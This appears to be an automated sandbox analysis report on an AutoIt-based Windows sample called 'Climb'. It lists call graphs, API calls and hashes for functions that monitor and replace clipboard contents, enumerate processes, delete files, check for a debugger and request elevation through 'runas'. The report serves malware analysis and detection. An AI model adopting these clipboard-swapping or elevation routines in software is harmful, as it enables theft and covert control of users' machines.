105529->105508 105529->105509 105529->105511 105529->105512 105529->105513 105529->105514 105529->105518 105529->105520 105529->105521 105529->105522 105529->105523 105529->105524 105529->105525 105529->105527 105529->105528 105530->105499 105531->105520 105532->105528 105533->105520 105534->105520 105535->105520 105536 5781000 105537 5781102 105536->105537 105538 5781012 105536->105538 105539 578103a OpenClipboard 105538->105539 105540 5781030 Sleep 105538->105540 105541 57810f9 GetClipboardSequenceNumber 105539->105541 105542 578104a GetClipboardData 105539->105542 105540->105538 105541->105538 105543 578105a GlobalLock 105542->105543 105544 57810f3 CloseClipboard 105542->105544 105543->105544 105545 578106b 105543->105545 105544->105541 105545->105545 105546 578108d GlobalAlloc 105545->105546 105547 57810e9 GlobalUnlock 105546->105547 105548 578109d GlobalLock 105546->105548 105547->105544 105549 57810b0 105548->105549 105550 57810b9 GlobalUnlock 105549->105550 105551 57810cb EmptyClipboard SetClipboardData 105550->105551 105552 57810e0 GlobalFree 105550->105552 105551->105547 105551->105552 105552->105547 105553 a6f4dc 105554 a6cab0 207 API calls 105553->105554 105555 a6f4ea 105554->105555 105556 ab5650 105565 a7e3d5 105556->105565 105558 ab5666 105561 ab56e1 105558->105561 105574 a7aa65 9 API calls 105558->105574 105560 ab56c1 105560->105561 105575 ad247e 8 API calls 105560->105575 105563 ab61d7 105561->105563 105576 ad3fe1 81 API calls __wsopen_s 105561->105576 105566 a7e3f6 105565->105566 105567 a7e3e3 105565->105567 105569 a7e3fb 105566->105569 105570 a7e429 105566->105570 105577 a6b4c8 8 API calls 105567->105577 105572 a8014b 8 API calls 105569->105572 105578 a6b4c8 8 API calls 105570->105578 105573 a7e3ed 105572->105573 105573->105558 105574->105560 105575->105561 105576->105563 105577->105573 105578->105573 105579 a6dd3d 105580 a6dd63 105579->105580 105581 ab19c2 105579->105581 105582 a6dead 105580->105582 105584 a8014b 8 API calls 105580->105584 105583 ab1a82 105581->105583 105588 ab1a26 105581->105588 105592 ab1a46 105581->105592 105589 a8017b 8 API calls 105582->105589 105624 ad3fe1 81 API calls __wsopen_s 105583->105624 105591 a6dd8d 105584->105591 105586 ab1a7d 105622 a7e6e8 207 API calls 105588->105622 105597 a6dee4 __fread_nolock 105589->105597 105593 a8014b 8 API calls 105591->105593 105591->105597 105592->105586 105623 ad3fe1 81 API calls __wsopen_s 105592->105623 105595 a6dddb 105593->105595 105594 a8017b 8 API calls 105594->105597 105595->105588 105596 a6de16 105595->105596 105598 a70340 207 API calls 105596->105598 105597->105592 105597->105594 105599 a6de29 105598->105599 105599->105586 105599->105597 105600 ab1aa5 105599->105600 105601 a6de77 105599->105601 105603 a6d526 105599->105603 105625 ad3fe1 81 API calls __wsopen_s 105600->105625 105601->105582 105601->105603 105604 a8014b 8 API calls 105603->105604 105605 a6d589 105604->105605 105606 a6c32d 8 API calls 105605->105606 105607 a6d5b3 105606->105607 105608 a8014b 8 API calls 105607->105608 105609 a6d66e ISource 105608->105609 105613 ab1f79 105609->105613 105615 ab1f94 105609->105615 105616 a6bed9 8 API calls 105609->105616 105617 a6c3ab 8 API calls 105609->105617 105619 a6d911 ISource 105609->105619 105626 a6b4c8 8 API calls 105609->105626 105610 a6c3ab 8 API calls 105618 a6d9ac ISource 105610->105618 105627 ac56ae 8 API calls ISource 105613->105627 105616->105609 105617->105609 105620 a6d9c3 105618->105620 105621 a7e30a 8 API calls ISource 105618->105621 105619->105610 105619->105618 105621->105618 105622->105592 105623->105586 105624->105586 105625->105586 105626->105609 105627->105615 105628 a7235c 105630 a72365 __fread_nolock 105628->105630 105629 a68ec0 52 API calls 105629->105630 105630->105629 105631 ab74e3 105630->105631 105632 a71ff7 __fread_nolock 105630->105632 105634 a723b6 105630->105634 105635 a8014b 8 API calls 105630->105635 105639 a8017b 8 API calls 105630->105639 105640 ac13c8 8 API calls __fread_nolock 105631->105640 105637 a67d74 8 API calls 105634->105637 105635->105630 105636 ab74ef 105636->105632 105638 a6bed9 8 API calls 105636->105638 105637->105632 105638->105632 105639->105630 105640->105636 105641 a6105b 105646 a652a7 105641->105646 105643 a6106a 105677 a80413 29 API calls __onexit 105643->105677 105645 a61074 105647 a652b7 __wsopen_s 105646->105647 105648 a6bf73 8 API calls 105647->105648 105649 a6536d 105648->105649 105650 a65594 10 API calls 105649->105650 105651 a65376 105650->105651 105678 a65238 105651->105678 105654 a66b7c 8 API calls 105655 a6538f 105654->105655 105656 a66a7c 8 API calls 105655->105656 105657 a6539e 105656->105657 105658 a6bf73 8 API calls 105657->105658 105659 a653a7 105658->105659 105660 a6bd57 8 API calls 105659->105660 105661 a653b0 RegOpenKeyExW 105660->105661 105662 aa4be6 RegQueryValueExW 105661->105662 105666 a653d2 105661->105666 105663 aa4c7c RegCloseKey 105662->105663 105664 aa4c03 105662->105664 105663->105666 105676 aa4c8e _wcslen 105663->105676 105665 a8017b 8 API calls 105664->105665 105667 aa4c1c 105665->105667 105666->105643 105669 a6423c 8 API calls 105667->105669 105668 a6655e 8 API calls 105668->105676 105670 aa4c27 RegQueryValueExW 105669->105670 105671 aa4c44 105670->105671 105673 aa4c5e ISource 105670->105673 105672 a68577 8 API calls 105671->105672 105672->105673 105673->105663 105674 a6b329 8 API calls 105674->105676 105675 a66a7c 8 API calls 105675->105676 105676->105666 105676->105668 105676->105674 105676->105675 105677->105645 105679 aa22d0 __wsopen_s 105678->105679 105680 a65245 GetFullPathNameW 105679->105680 105681 a65267 105680->105681 105682 a68577 8 API calls 105681->105682 105683 a65285 105682->105683 105683->105654 105684 a61098 105689 a65fc8 105684->105689 105688 a610a7 105690 a6bf73 8 API calls 105689->105690 105691 a65fdf GetVersionExW 105690->105691 105692 a68577 8 API calls 105691->105692 105693 a6602c 105692->105693 105694 a6adf4 8 API calls 105693->105694 105708 a66062 105693->105708 105695 a66056 105694->105695 105697 a655dc 8 API calls 105695->105697 105696 a6611c GetCurrentProcess IsWow64Process 105698 a66138 105696->105698 105697->105708 105699 aa5269 GetSystemInfo 105698->105699 105700 a66150 LoadLibraryA 105698->105700 105701 a66161 GetProcAddress 105700->105701 105702 a6619d GetSystemInfo 105700->105702 105701->105702 105705 a66171 GetNativeSystemInfo 105701->105705 105703 a66177 105702->105703 105706 a6109d 105703->105706 105707 a6617b FreeLibrary 105703->105707 105704 aa5224 105705->105703 105709 a80413 29 API calls __onexit 105706->105709 105707->105706 105708->105696 105708->105704 105709->105688 105710 ab6555 105711 a8014b 8 API calls 105710->105711 105712 ab655c 105711->105712 105714 a8017b 8 API calls 105712->105714 105716 ab6575 __fread_nolock 105712->105716 105713 a8017b 8 API calls 105715 ab659a 105713->105715 105714->105716 105716->105713

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 234 a65fc8-a66037 call a6bf73 GetVersionExW call a68577 239 aa507d-aa5090 234->239 240 a6603d 234->240 241 aa5091-aa5095 239->241 242 a6603f-a66041 240->242 243 aa5098-aa50a4 241->243 244 aa5097 241->244 245 a66047-a660a6 call a6adf4 call a655dc 242->245 246 aa50bc 242->246 243->241 248 aa50a6-aa50a8 243->248 244->243 258 a660ac-a660ae 245->258 259 aa5224-aa522b 245->259 251 aa50c3-aa50cf 246->251 248->242 250 aa50ae-aa50b5 248->250 250->239 254 aa50b7 250->254 252 a6611c-a66136 GetCurrentProcess IsWow64Process 251->252 256 a66195-a6619b 252->256 257 a66138 252->257 254->246 260 a6613e-a6614a 256->260 257->260 261 a660b4-a660b7 258->261 262 aa5125-aa5138 258->262 263 aa524b-aa524e 259->263 264 aa522d 259->264 265 aa5269-aa526d GetSystemInfo 260->265 266 a66150-a6615f LoadLibraryA 260->266 261->252 268 a660b9-a660f5 261->268 269 aa513a-aa5143 262->269 270 aa5161-aa5163 262->270 271 aa5239-aa5241 263->271 272 aa5250-aa525f 263->272 267 aa5233 264->267 273 a66161-a6616f GetProcAddress 266->273 274 a6619d-a661a7 GetSystemInfo 266->274 267->271 268->252 276 a660f7-a660fa 268->276 277 aa5150-aa515c 269->277 278 aa5145-aa514b 269->278 279 aa5198-aa519b 270->279 280 aa5165-aa517a 270->280 271->263 272->267 281 aa5261-aa5267 272->281 273->274 282 a66171-a66175 GetNativeSystemInfo 273->282 275 a66177-a66179 274->275 283 a66182-a66194 275->283 284 a6617b-a6617c FreeLibrary 275->284 285 a66100-a6610a 276->285 286 aa50d4-aa50e4 276->286 277->252 278->252 289 aa519d-aa51b8 279->289 290 aa51d6-aa51d9 279->290 287 aa517c-aa5182 280->287 288 aa5187-aa5193 280->288 281->271 282->275 284->283 285->251 294 a66110-a66116 285->294 291 aa50e6-aa50f2 286->291 292 aa50f7-aa5101 286->292 287->252 288->252 295 aa51ba-aa51c0 289->295 296 aa51c5-aa51d1 289->296 290->252 293 aa51df-aa5206 290->293 291->252 297 aa5103-aa510f 292->297 298 aa5114-aa5120 292->298 299 aa5208-aa520e 293->299 300 aa5213-aa521f 293->300 294->252 295->252 296->252 297->252 298->252 299->252 300->252
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00A65FF7
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00AFDC2C,00000000,?,?), ref: 00A66123
                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00A6612A
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A66155
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A66167
                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A66175
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00A6617C
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00A661A1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                          • Opcode ID: 79abcf0e85c3ff9b58f74f1cdf8c68412598e098bdced35bfe95b64806eff573
                                                                                                                                                                          • Instruction ID: 4ac74cdae28523d730b54723cedc0c351a8b0ed33c52763b1c5d8b490be1a431
                                                                                                                                                                          • Opcode Fuzzy Hash: 79abcf0e85c3ff9b58f74f1cdf8c68412598e098bdced35bfe95b64806eff573
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA1803290A6D4DFC712CBB87C411AD7FB56B27300B2849A9D48197362DE7D4948CB7E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 05781032
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0578103C
                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0578104C
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0578105D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05781090
                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 057810A0
                                                                                                                                                                          • GlobalUnlock.KERNEL32 ref: 057810C1
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 057810CB
                                                                                                                                                                          • SetClipboardData.USER32(0000000D), ref: 057810D6
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 057810E3
                                                                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 057810ED
                                                                                                                                                                          • CloseClipboard.USER32 ref: 057810F3
                                                                                                                                                                          • GetClipboardSequenceNumber.USER32 ref: 057810F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3577551352.0000000005781000.00000020.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3577531968.0000000005780000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3577570911.0000000005782000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_5780000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1416286485-0
                                                                                                                                                                          • Opcode ID: 9e630ead2686799de628928419814eca76a050cf523d6e6a90063a34a051c084
                                                                                                                                                                          • Instruction ID: fd13a6dd428d1ba0ca5ccb7cbecc653cea03784e3ceeb142dd659aa97935b3ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e630ead2686799de628928419814eca76a050cf523d6e6a90063a34a051c084
                                                                                                                                                                          • Instruction Fuzzy Hash: 8421C875698250DBD7203BB1AC0EB7A7FE9FF04742F548028F945D6552EF218801F7A1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A63368,?), ref: 00A633BB
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A63368,?), ref: 00A633CE
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00B32418,00B32400,?,?,?,?,?,?,00A63368,?), ref: 00A6343A
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                            • Part of subcall function 00A6425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A63462,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A642A0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A634BB
                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AA3CB0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00AA3CF1
                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B231F4,00B32418,?,?,?,?,?,?,?,00A63368), ref: 00AA3D7A
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00AA3D81
                                                                                                                                                                            • Part of subcall function 00A634D3: GetSysColorBrush.USER32(0000000F), ref: 00A634DE
                                                                                                                                                                            • Part of subcall function 00A634D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A634ED
                                                                                                                                                                            • Part of subcall function 00A634D3: LoadIconW.USER32(00000063), ref: 00A63503
                                                                                                                                                                            • Part of subcall function 00A634D3: LoadIconW.USER32(000000A4), ref: 00A63515
                                                                                                                                                                            • Part of subcall function 00A634D3: LoadIconW.USER32(000000A2), ref: 00A63527
                                                                                                                                                                            • Part of subcall function 00A634D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A6353F
                                                                                                                                                                            • Part of subcall function 00A634D3: RegisterClassExW.USER32(?), ref: 00A63590
                                                                                                                                                                            • Part of subcall function 00A635B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A635E1
                                                                                                                                                                            • Part of subcall function 00A635B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63602
                                                                                                                                                                            • Part of subcall function 00A635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A63616
                                                                                                                                                                            • Part of subcall function 00A635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A6361F
                                                                                                                                                                            • Part of subcall function 00A6396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63A3C
                                                                                                                                                                          Strings
                                                                                                                                                                          • AutoIt, xrefs: 00AA3CA5
                                                                                                                                                                          • runas, xrefs: 00AA3D75
                                                                                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AA3CAA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                          • API String ID: 683915450-2030392706
                                                                                                                                                                          • Opcode ID: a2a0a9dab6993293abd63aa26d0e1fe0406b482a5b1c212d22ed0cf110ef0208
                                                                                                                                                                          • Instruction ID: 3254f1f9b081f2161ecba1a884626dd041909e45286f71b3eb0cfbdb03b8cb32
                                                                                                                                                                          • Opcode Fuzzy Hash: a2a0a9dab6993293abd63aa26d0e1fe0406b482a5b1c212d22ed0cf110ef0208
                                                                                                                                                                          • Instruction Fuzzy Hash: AB51F932108340AECB06FFA0AD15DBEBBF99F95740F14052DF192571A2DF348A4AC762

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 987 acdc54-acdc9b call a6bf73 * 3 call a65851 call aceab0 998 acdc9d-acdca6 call a66b7c 987->998 999 acdcab-acdcdc call a6568e FindFirstFileW 987->999 998->999 1003 acdcde-acdce0 999->1003 1004 acdd4b-acdd52 FindClose 999->1004 1003->1004 1006 acdce2-acdce7 1003->1006 1005 acdd56-acdd78 call a6bd98 * 3 1004->1005 1008 acdce9-acdd24 call a6bed9 call a67bb5 call a66b7c DeleteFileW 1006->1008 1009 acdd26-acdd38 FindNextFileW 1006->1009 1008->1009 1022 acdd42-acdd49 FindClose 1008->1022 1009->1003 1010 acdd3a-acdd40 1009->1010 1010->1003 1022->1005
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871
                                                                                                                                                                            • Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00ACDCCB
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDD1B
                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ACDD2C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ACDD43
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ACDD4C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                          • Opcode ID: 262bd2fe274d2d8f052cf537780e5bb55c5a0f4b093601af156fd8e8c4e591d5
                                                                                                                                                                          • Instruction ID: 98adc45eb92b76ccd946a5eb3741a0b9cd379c40b9623babc11a9a07ebe3f91d
                                                                                                                                                                          • Opcode Fuzzy Hash: 262bd2fe274d2d8f052cf537780e5bb55c5a0f4b093601af156fd8e8c4e591d5
                                                                                                                                                                          • Instruction Fuzzy Hash: B2317E314193459FC302EF60D985DEFBBF8AE95304F404D6DF4D6821A1EB21DA0ACBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00ACDDAC
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00ACDDBA
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00ACDDDA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00ACDE87
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                          • Opcode ID: c4ffc65f9eb13b945e36b6c78a6e2ff2ebd58709fc0c8a8daa31911c528b6420
                                                                                                                                                                          • Instruction ID: adb841ebf3dacb38e938b976860a247dd4dc6b948a789f314133d1ee80f2621c
                                                                                                                                                                          • Opcode Fuzzy Hash: c4ffc65f9eb13b945e36b6c78a6e2ff2ebd58709fc0c8a8daa31911c528b6420
                                                                                                                                                                          • Instruction Fuzzy Hash: 32316F711083019FD311EF60D885FAFBBF8AF99354F04092DF585871A1EB719985CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetInputState.USER32 ref: 00A6EF07
                                                                                                                                                                          • timeGetTime.WINMM ref: 00A6F107
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F228
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00A6F27B
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00A6F289
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F29F
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00A6F2B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2189390790-0
                                                                                                                                                                          • Opcode ID: 4129db4c6b733412eb07534a77656be492f9381e53657637f0fbade5c4a22f50
                                                                                                                                                                          • Instruction ID: 7218734a169708f292684a8b4f4d7a435570640d4a4d81250f152653977b988f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4129db4c6b733412eb07534a77656be492f9381e53657637f0fbade5c4a22f50
                                                                                                                                                                          • Instruction Fuzzy Hash: 96321371608302EFDB28DF24D884BAAB7F9BF85304F14462DE5558B292D775E984CF82

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00A63657
                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00A63681
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A63692
                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00A636AF
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A636BF
                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 00A636D5
                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A636E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                                                                          • Opcode ID: df9934db3ba7a848164022bcdb5fa0a6ddfedb60f44353e75a46313b513801c3
                                                                                                                                                                          • Instruction ID: c4105d06203028a4ae7483c6225527b9afcb29309b9af1ab18b9a1e143b67cab
                                                                                                                                                                          • Opcode Fuzzy Hash: df9934db3ba7a848164022bcdb5fa0a6ddfedb60f44353e75a46313b513801c3
                                                                                                                                                                          • Instruction Fuzzy Hash: C921C5B1D01218AFDB01DFE4EC89BADBBB5FB08710F10421AF611A72A0DBB55545CF95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
